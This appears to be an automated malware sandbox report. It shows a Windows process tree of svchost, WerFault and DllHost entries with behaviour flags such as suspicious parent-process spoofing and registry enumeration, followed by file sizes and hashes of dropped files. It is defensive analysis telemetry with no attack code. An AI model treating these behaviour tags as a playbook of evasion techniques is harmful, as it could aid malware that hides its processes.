C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:3768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1180 -ip 11802⤵PID:936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4800 -ip 48002⤵PID:1384
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 3216 -ip 32162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2944
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 2908 -ip 29082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4392
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1280
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3216
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3216 -s 3682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1156
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2908
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2908 -s 4642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3480
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5f993580670e3aef0530dbdfdd52e94ca
SHA10147d041f26bddd0dbb53159b35240542aaa154b
SHA25688ef519bcb69ad486b6f68a2ddc293fc39f921425801b592240d221210ac812c
SHA512f5af66fd5b40b51f49cf4818d174c994e77eece8088cd0b2d4cd7c3846a26e743089d22d2f743fb5bc3abb53d9de27bee85066943b6f05ce5d2608fc88fd3566
-
Filesize
37KB
MD5b27e865aeac2f30edb1a7421f69b706b
SHA1d6c5f66386f5882eb34a22e8d2fe9f46585289f7
SHA256c06fe2e6c1a21a99af76b67f9d30a871d883c00571da6061a464ad45c39c4f8d
SHA512b3bdc62fa35e497bc9b4c922b1a9e14794574cc8da89decd716fdcde8ce203e2164e5d644a54ca8adc37cc00647b0d1c0aa23b134d1769df694d3eb988879914
-
Filesize
13KB
MD5b67d0c36c8d127de55331c2f01d276ee
SHA1966d07d31b845dc7a3b17a1ce96a6ebca827cf8f
SHA256f8f1fdcd622844f6c78d8fa131a83a275030b23cb50b14c409094054c0b2be1a
SHA5126a32af0f9b9c28d811b34f32c7be1d5ef3e58f00fb624965f82796951940f3c63bd53e73314efb44f3a3e0982e5808ceb03ab18195a55b2a46510e347e3a1cdd
-
Filesize
13KB
MD562abcce7bfae19943d01ae631ccba052
SHA113c7ab9038fb7778d093688891aab710315e5e93
SHA256438b62b424ca1a722bb0d5da18e9d5a415e655931fc96846c20576973de29461
SHA5127ab8c195a1fa003c9d6109d2d5fc790306dc22e4b98e48a1c89b5b4d37fe0a60010c7edc82d4b1e0db614db0681b9aae317318c296b5e7d174045c26a4f63822
-
Filesize
35KB
MD57a0fc09afe684df626cb0946e7adecea
SHA1519476614bec773806949a5062a9a1b88ceb8a8e
SHA256a389f12dda67595460d6126d4892f20e0611438592b896c0286d8ee1102b8aa6
SHA512faf437df3261759f906c2ea180b02e707d9723807f32c42cf0513014b4192eef02e70089a32641979ba076c6bcaafeff4ef581c7f9ef728b184440d27e7c2e45
-
Filesize
13KB
MD5e4d1099730a7b3cef613e513c8ab93c1
SHA107b46e39ba18f2257fa457503cf10f0ae432a2fb
SHA256aed2a3f4ed925f435e0a49755faec14ed25ae727975947e43ca2f027a434adf4
SHA51297a1f7525d250f789de313b0b8b94fcf58d74fc88eabaa3e0a349c1590203036bbf1ea3db16fb966532195066b055304a21004cc16243c770a88e5b00f0f313a
-
Filesize
35KB
MD5f49fd4a936729b7d48d000e0d25b1749
SHA1c6086c51d7d491a071441a553475f107afdf5ad6
SHA256413f00c12a845c63b27793846e1131fa0592c2033eacfe5c8d3cb00fbc340106
SHA5120055710db934ab84003612e7482ebc08bbf446af1a2bf0b4166f673bdd8b51a8f9ce6d9f7d6b57d8f6db06b7f345898b610f03dc97fffacf95e3ab148e612953
-
Filesize
13KB
MD524f9a61651b91727b24e7f71d73be9f3
SHA110234bdd506470ea68780abe131aaf9fc6e1a5c1
SHA256d4721814f7bf31176a91686d5b0272931912b4ada5d689c9b720d263b65330eb
SHA5128e0074da8c72fc169edfeb162d992ac4d9f421cd354b20acb59255c9dd7049366d83e02a8407666d16f79a895f23fcdaedb1f1a28aafb9f7e23af0beaa9480b2
-
Filesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
19KB
MD595b5d975377c32a6ef28bbf4018379ec
SHA1a27a10c1e0afa57f0341ea6529adb9854ae9e6ee
SHA25699d85f152acf2a98615b3c2dc1fc0a2bde5d960871d7625d93b8c9c80744e2b8
SHA512ab12d12cd182873162b972617a07c20376aa502377ad6c6998558def326b8fd206d9168d3a17ef3a19f5f86b9eca5833823ce89590a8824ee25b7032b803345b
-
Filesize
1KB
MD5c697637a9b17f577fccd7e83a5495810
SHA104e6054584786b88994b0e0a871562227fe2a435
SHA25654992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA51266f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
Filesize
8KB
MD597e21c3ace4c909e979d057e48b0511b
SHA1f9abd1563142bc87241792a6bff9266b000477f9
SHA256e47e6b4f3b270f2492a6dc3a787b5d757677e806021cc0c7406b9b68c4928215
SHA51272eb2f4cb72a868fddeebe7d3206a6df581dc415ffb39552b16b805feef268c6e32295f61c9125699d95728812704438272c3e61097db6454b13455358af2580
-
Filesize
512KB
MD592a5394c98970c2df97518ccfc941abc
SHA1ae03e5eb972afe00e87028bf85c0cf82734748dd
SHA2564e13d98ce827d7c819bf3c4a9f2710375700d4be1dd86e70020fa8fd6a849f6b
SHA5123a0fee76337d78dbeca41301158bb33d2a3f78fb4c82a27c973d4dfd52ec072561568f2721a661f28afc26765cbd846cca270005c0e388c9fb88f4ffe5928d5f
-
Filesize
14.0MB
MD5fc15ddc1aa5e610bdb3810289a075271
SHA1ff298ce2d03f8e42eb7eba3fd94310a94148dcae
SHA2567fe3aa950904d80928e76f7ced4c581374da94acf39546ec5e69921ee943f87c
SHA512e2ead360c0244bedbd3dd5b5d200567aa3b0b1d7424440e0ff6132a4408e38d2c53ea20391863680fb54b7aa5aa7999ae4b6e70ee597676a4be5f96e4804435c
-
Filesize
16KB
MD53694b353dbe71a48a6dcb93f2725f228
SHA143822178e3d40fbf92093b57ae178019fba8f6ec
SHA256e8dda600070ff70908f0f315720406011f205656af8cab423660931a2ae8bdcd
SHA5128614cf3c1e79350ed721ee6e991d1613e09d5edc2f5896f66cf3aae372a796cfd18320fbb6d3f0de707c6931bae3a90786e8a8a658239837858868f11aedea59
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
477KB
MD53753f9966e5b4fdc87184c1749f2bd25
SHA169b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
SHA2560f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
SHA5123283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6
-
Filesize
477KB
MD53753f9966e5b4fdc87184c1749f2bd25
SHA169b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
SHA2560f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
SHA5123283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5